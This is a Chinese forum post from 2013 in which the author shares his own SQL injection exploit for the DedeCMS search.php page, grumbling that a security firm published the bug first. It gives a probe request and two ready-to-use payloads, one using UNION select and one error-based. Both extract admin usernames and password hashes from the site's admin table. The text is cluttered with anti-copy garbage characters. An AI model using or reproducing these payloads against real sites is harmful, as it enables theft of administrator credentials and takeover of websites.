转载不加作者名的没JJ \& E' c' G& O' z1 g! g8 g
6 |$ N6 A; @3 i* y" z6 T6 s; y9 X$ l( m哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
* |% ~" x& H1 z U- `" e/ u% ?4 I4 y% U: M5 x
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
9 M% K. j) q% z3 z" \: g
& c# }. A. E0 m$ l# ?) a我一般是这样测试的:/ \2 R" k1 e h: a$ R
^/ {3 i8 E! b7 Q% d5 o' W提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a$ Q7 Z# G' s# r
' m! m( a9 ~( ~. G. C转载不加作者名的没JJ
1 J( S7 e/ v6 d6 h; I* A& `) A' w2 \4 z9 b9 v3 ] k) U
作者:鬼哥
6 B0 t ^% b a+ y+ _7 m
- J+ z" l, m) c 2 \. z% X; N Q( U- S6 u; ~
/ X8 @6 c! Z+ z! A3 b' N看结果如果提示2 L; l% k" o6 Z! u/ R
& Z8 F9 J t8 p( ?
Safe Alert: Request Error step 2 !6 S5 J# t6 M) p
- U5 i5 `- I9 g. m& n: ]4 m1 v那么直接用下面的exp
; |/ }, I F4 m$ z
3 l9 ?. K3 r2 ]& |. Fxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a9 `6 G8 A) d3 V2 Q+ A" g# p# ?
3 k/ Y ?3 o( U. C* \! ?( T4 y3 x3 Z+ Q. R, m+ a4 t
看结果如果提示. f5 ~) k K, m: P3 g& I# ]
9 w. S& X% E, f
Safe Alert: Request Error step 1 !
% ~- [- e. h5 l; {0 }% _( J
2 a, h8 D* D- v% G: w- [# N那么直接用下面的exp1 v" q* A/ f! @$ ^+ X
6 m: ]# u% T0 h' ^. j
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
# Z6 w) L, g8 z8 w
" D' g, S% r1 `8 ^
* z. z& y8 A( R/ m如果正常显示证明漏洞不存在了。2 a @2 S6 |: y1 x: N& j
8 {* s: `4 F& B& L V7 ~/ k
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对